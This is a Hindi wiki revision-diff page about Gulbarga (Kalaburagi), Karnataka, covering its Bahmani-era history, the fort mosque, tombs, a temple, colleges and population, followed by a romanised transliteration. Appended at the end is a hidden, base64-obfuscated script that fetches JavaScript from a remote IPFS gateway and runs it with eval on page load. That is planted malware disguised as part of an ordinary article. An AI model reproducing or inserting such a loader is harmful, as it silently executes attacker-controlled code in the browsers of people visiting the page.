Difference between revisions of "गुलबर्ग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "यहां" to "यहाँ")
Line 1: Line 1:
 
[[चित्र:Mosque-Gulbarg-Fort-Gulbarg.jpg|मस्जिद, गुलबर्ग क़िला,गुलबर्ग<br/> Mosque, Gulbarg Fort, Gulbarg|thumb]]
 
[[चित्र:Mosque-Gulbarg-Fort-Gulbarg.jpg|मस्जिद, गुलबर्ग क़िला,गुलबर्ग<br/> Mosque, Gulbarg Fort, Gulbarg|thumb]]
==स्थापना==
+
गुलबर्ग या गुलबर्गा शहर [[भारत]] के पश्चिमोत्तर [[कर्नाटक]] (भूतपूर्व [[मैसूर]]) राज्य में स्थित है। गुलबर्ग का प्राचीन नाम कलबुर्गी है। यह नगर दक्षिण के बहमनी नरेशों के समय से प्रसिद्ध हुआ।   
गुलबर्ग या गुलबर्गा शहर [[भारत]] के पश्चिमोत्तर [[कर्नाटक]] (भूतपूर्व मैसूर) राज्य में स्थित है। गुलबर्ग का प्राचीन नाम कलबुर्गी है। यह नगर दक्षिण के बहमनी नरेशों के समय से प्रसिद्ध हुआ।   
 
  
 
==इतिहास==
 
==इतिहास==
Line 32: Line 31:
  
 
==पर्यटन==
 
==पर्यटन==
यहाँ एक प्राचीन सुदृढ़ दुर्ग स्थित है। जिसके अन्दर एक विशाल मसजिद है जो 1347 ई. में बनी थी। यह 216 फुट लम्बी और 176 फुट चौड़ी है। इसके अन्दर कोई आंगन नहीं है वरन् पूरी मसजिद एक ही छ्त के नीचे है। कहा जाता है कि यह [[भारत]] की सबसे बड़ी मसजिद है। इसकी बनावट में स्पेन नगर के कोरडावा की मसजिद की अनुकृति दिखलाई पड़ती है। अन्दर से यह प्राचीन गिरजाघरों से मिलती-जुलती है। इसका एक सुदीर्घ गुंबद है जिसके चारों तरफ छोटे-छोटे गुंबद हैं। मुस्लिम संत ख्वाजा बंदा-नवाज़ की दरगाह (निर्माण 1640 ई.) भी गुलबर्ग का  प्रसिद्ध स्मारक है। इसका गुम्बद प्रायः अस्सी फुट ऊँचा है। दरगाह के अन्दर नक़्क़ारखाना, सराय, मदरसा और औरंगज़ेब की मसजिद है। बहमनी सुल्तानों के मक़बरे भी यहाँ स्थित हैं। बहमनी सुल्तानों और उनके दरबारियों ने गुलबर्ग में बहुत इमारतें बनवायीं थीं। लेकिन ये इमारतें इतनी बड़ी और कमज़ोर थीं कि अब उनके ध्वंसावशेष ही देखे जा सकते हैं।
+
यहाँ एक प्राचीन सुदृढ़ दुर्ग स्थित है। जिसके अन्दर एक विशाल मस्जिद है जो 1347 ई. में बनी थी। यह 216 फुट लम्बी और 176 फुट चौड़ी है। इसके अन्दर कोई आंगन नहीं है वरन पूरी मस्जिद एक ही छ्त के नीचे है। कहा जाता है कि यह [[भारत]] की सबसे बड़ी मस्जिद है। इसकी बनावट में स्पेन नगर के कोरडावा की मस्जिद की अनुकृति दिखलाई पड़ती है। अन्दर से यह प्राचीन गिरजाघरों से मिलती-जुलती है। इसका एक सुदीर्घ गुंबद है जिसके चारों तरफ छोटे-छोटे गुंबद हैं। मुस्लिम संत ख्वाजा बंदा-नवाज़ की दरगाह (निर्माण 1640 ई.) भी गुलबर्ग का  प्रसिद्ध स्मारक है। इसका गुम्बद प्रायः अस्सी फुट ऊँचा है। दरगाह के अन्दर नक़्क़ारखाना, सराय, मदरसा और औरंगज़ेब की मस्जिद है। बहमनी सुल्तानों के मक़बरे भी यहाँ स्थित हैं। बहमनी सुल्तानों और उनके दरबारियों ने गुलबर्ग में बहुत इमारतें बनवायीं थीं। लेकिन ये इमारतें इतनी बड़ी और कमज़ोर थीं कि अब उनके ध्वंसावशेष ही देखे जा सकते हैं।
  
 
===ऐतिहासिक स्मारक===
 
===ऐतिहासिक स्मारक===
Line 38: Line 37:
 
*'''हसनगंगू का मक़बरा''' (हसनगंगू ने ही बहमनी वंश की नींव डाली थी),
 
*'''हसनगंगू का मक़बरा''' (हसनगंगू ने ही बहमनी वंश की नींव डाली थी),
 
*'''महमूदशाहका मक़बरा'''
 
*'''महमूदशाहका मक़बरा'''
*'''अफ़जलख़ाँ की मसजिद'''
+
*'''अफ़जलख़ाँ की मस्जिद'''
*'''लंगर की मसजिद''':-लंगर की मसजिद की छ्त हाथी की पीठ की भाँति दिखाई देती है और बौद्ध चैत्वों की अनुकृति जान पड़ती है।
+
*'''लंगर की मस्जिद''':-लंगर की मस्जिद की छ्त हाथी की पीठ की भाँति दिखाई देती है और बौद्ध चैत्वों की अनुकृति जान पड़ती है।
 
*'''चाँदबीबी का मक़बरा''':-चाँदबीबी का मक़बरा बीजापुर की शैली में बना हुआ है और स्वयं उसी का बनवाया हुआ है किन्तु चाँदबीबी की क़ब्र उसमें नहीं है।
 
*'''चाँदबीबी का मक़बरा''':-चाँदबीबी का मक़बरा बीजापुर की शैली में बना हुआ है और स्वयं उसी का बनवाया हुआ है किन्तु चाँदबीबी की क़ब्र उसमें नहीं है।
 
*'''सिद्दी अंबर का मक़बरा'''
 
*'''सिद्दी अंबर का मक़बरा'''
Line 46: Line 45:
  
 
===मन्दिर===
 
===मन्दिर===
गुलबर्ग के ऐतिहासिक  मन्दिरों में वासवेश्वर का मंदिर 19वीं शती की वास्तुकला का सुन्दर उदाहरण है। श्री वासवेश्वर (शरन बसप्पा) का जन्म आज से प्रायः सवाँ सौ वर्ष पूर्व गुलबर्ग ज़िले में स्थित अरलगुन्दागी नामक ग्राम में हुआ था। यह बचपन से ही सन्त स्वभाव के व्यक्ति थे। 35 वर्ष की आयु में इन्होंने संन्यास ले लिया किन्तु बाद में वे गुलबर्ग में रहकर जीवन भर जनार्दन की सेवा में लगे रहे और उन्होंने मानव मात्र की सेवा को ही अपने धार्मिक विचारों का केंद्र बना लिया। मार्च मास में इनके समाधि मन्दिर पर दूर-दूर से लोग आकर श्रद्धांजलि अर्पित करते हैं।
+
गुलबर्ग के ऐतिहासिक  मन्दिरों में वासवेश्वर का मंदिर 19वीं शती की वास्तुकला का सुन्दर उदाहरण है। श्री वासवेश्वर (शरन बसप्पा) का जन्म आज से प्रायः सवाँ सौ वर्ष पूर्व गुलबर्ग ज़िले में स्थित अरलगुन्दागी नामक ग्राम में हुआ था। यह बचपन से ही सन्त स्वभाव के व्यक्ति थे। 35 वर्ष की आयु में इन्होंने संन्यास ले लिया किन्तु बाद में वे गुलबर्ग में रहकर जीवन भर जनार्दन की सेवा में लगे रहे और उन्होंने मानव मात्र की सेवा को ही अपने धार्मिक विचारों का केंद्र बना लिया। [[मार्च]] मास में इनके समाधि मन्दिर पर दूर-दूर से लोग आकर श्रद्धांजलि अर्पित करते हैं।
 
+
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 
__INDEX__
 
__INDEX__
 
[[Category:कर्नाटक]][[Category:कर्नाटक_के_ऐतिहासिक_नगर]][[Category:कर्नाटक_के_ऐतिहासिक_स्थान]][[Category:कर्नाटक_के_नगर]][[Category:कर्नाटक_के_पर्यटन_स्थल]][[Category:पर्यटन कोश]][[Category:भारत के नगर]]
 
[[Category:कर्नाटक]][[Category:कर्नाटक_के_ऐतिहासिक_नगर]][[Category:कर्नाटक_के_ऐतिहासिक_स्थान]][[Category:कर्नाटक_के_नगर]][[Category:कर्नाटक_के_पर्यटन_स्थल]][[Category:पर्यटन कोश]][[Category:भारत के नगर]]

Revision as of 06:42, 2 November 2010

masjid, gulabarg qila,gulabarg
Mosque, Gulbarg Fort, Gulbarg|thumb
gulabarg ya gulabarga shahar bharat ke pashchimottar karnatak (bhootapoorv maisoor) rajy mean sthit hai. gulabarg ka prachin nam kalaburgi hai. yah nagar dakshin ke bahamani nareshoan ke samay se prasiddh hua.

itihas

dakshin ke bahamani vansh ke sansthapak sultan alauddin ne ise 1347 ee. mean apani rajadhani banaya. usane isaka nam ehasanabad rakha. 1425 ee. tak yah is rajy ki rajadhani raha, jabaki 9vean sultan (1422-36) ne ise tyag kar bidar ko rajadhani banaya. varangal ke kakatiyoan ke rajy kshetr mean shamil is nagar ko aranbhik 14vian shatabdi mean pahale senapati uloog khaan aur bad mean sultan muhammad bin tugalaq dvara dilli ki saltanat mean shamil kar liya gaya. sultan ki mrityu ke bad yah bahamani rajy (1347 se lagabhag 1424 tak yah is samrajy ki rajadhani tha) ke adhin ho gaya aur is satta ke patan ke bad bijapur ke tahat a gaya. 17vian shatabdi mean mugal badashah aurangazeb dvara dakkan vijay ke bad ise phir se dilli saltanat mean shamil kar liya gaya, lekin 18vian shatabdi ke aranbh mean haidarabad rajy ki sthapana se yah dilli se alag ho gaya.

krishi aur khanij

gulabarg ke asapas ke kshetr ki adhikaansh abadi krishi kary mean sanlagn hai. jvar, dalahan, kapas, aur alasi yahaan ki pramukh fasalean haian.

udyog aur vyapar

muanbee (bhootapoorv madras) ke mukhy relamarg par sthit gulabarg kapas ke vyapar ka keandr hai. yahaan kapas otane aur gaanth banane ke karakhane tatha kataee v bunaee ki milean bhi haian. yahaan par ata aur tel milean v peant ke karakhane haian.

shikshan sansthan

gulabarg vishvavidyalay se sanbaddh kee k aaulej yahaan hai. jisamean:-

  • rooral ianjiniyariang k aaulej,
  • pi.di.e. k aaulej aauf ianjiniyariang,
  • k aaulej aauf farmesi,
  • alabadar deantal k aaulej,
  • ke.bi.en. k aaulej aauf ianjiniyariang,
  • em.ar. medikal k aaulej,
  • ech.ke.i.es. deantal k aaulej,
  • rajakiy p aauliteknik,
  • en.vi.p aauliteknik,
  • es.bi. k aaulej aauf saians shamil haian.

yahaan kala, vanijy, shiksha, ianjiniyariang, vidhi aur chikitsa vijnan ke mahavidyalayoan ke alava ek mahila mahavidyalay bhi hai. ye sabhi bhootapoorv gulabarg vishvavidyalay se sanbaddh haian.

janasankhya

gulabarg shahar ki janasankhya (2001 ki ganana ke anusar) 4,27,929 hai. aur gulabarg zile ki kul janasankhya 31,24,858 hai.

paryatan

yahaan ek prachin sudridh durg sthit hai. jisake andar ek vishal masjid hai jo 1347 ee. mean bani thi. yah 216 phut lambi aur 176 phut chau di hai. isake andar koee aangan nahian hai varan poori masjid ek hi chht ke niche hai. kaha jata hai ki yah bharat ki sabase b di masjid hai. isaki banavat mean spen nagar ke koradava ki masjid ki anukriti dikhalaee p dati hai. andar se yah prachin girajagharoan se milati-julati hai. isaka ek sudirgh guanbad hai jisake charoan taraph chhote-chhote guanbad haian. muslim sant khvaja banda-navaz ki daragah (nirman 1640 ee.) bhi gulabarg ka prasiddh smarak hai. isaka gumbad prayah assi phut ooancha hai. daragah ke andar naqqarakhana, saray, madarasa aur aurangazeb ki masjid hai. bahamani sultanoan ke maqabare bhi yahaan sthit haian. bahamani sultanoan aur unake darabariyoan ne gulabarg mean bahut imaratean banavayian thian. lekin ye imaratean itani b di aur kamazor thian ki ab unake dhvansavashesh hi dekhe ja sakate haian.

aitihasik smarak

gulabarg shahar mean kee prachin smarak haian. poorvi hisse mean bahamani shasakoan ke maqabare haian. gulabarg ke aitihasik smarak haian:-

  • hasanagangoo ka maqabara (hasanagangoo ne hi bahamani vansh ki nianv dali thi),
  • mahamoodashahaka maqabara
  • afajalakhaan ki masjid
  • langar ki masjid:-langar ki masjid ki chht hathi ki pith ki bhaanti dikhaee deti hai aur bauddh chaitvoan ki anukriti jan p dati hai.
  • chaandabibi ka maqabara:-chaandabibi ka maqabara bijapur ki shaili mean bana hua hai aur svayan usi ka banavaya hua hai kintu chaandabibi ki qabr usamean nahian hai.
  • siddi aanbar ka maqabara
  • chor guanbad:- chor guanbad ki bhoomigat bhoolabhulaiya mean pichhale jamane mean chor-dakuoan ne adda bana liya tha. isi bhavan mean kanpheshans aauv-e-thag ka prasiddh lekhak mi doj telar bhi thahara tha.
  • kalandarakhaan ki masjid v inhian ka maqabara.

mandir

gulabarg ke aitihasik mandiroan mean vasaveshvar ka mandir 19vian shati ki vastukala ka sundar udaharan hai. shri vasaveshvar (sharan basappa) ka janm aj se prayah savaan sau varsh poorv gulabarg zile mean sthit aralagundagi namak gram mean hua tha. yah bachapan se hi sant svabhav ke vyakti the. 35 varsh ki ayu mean inhoanne sannyas le liya kintu bad mean ve gulabarg mean rahakar jivan bhar janardan ki seva mean lage rahe aur unhoanne manav matr ki seva ko hi apane dharmik vicharoan ka keandr bana liya. march mas mean inake samadhi mandir par door-door se log akar shraddhaanjali arpit karate haian.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>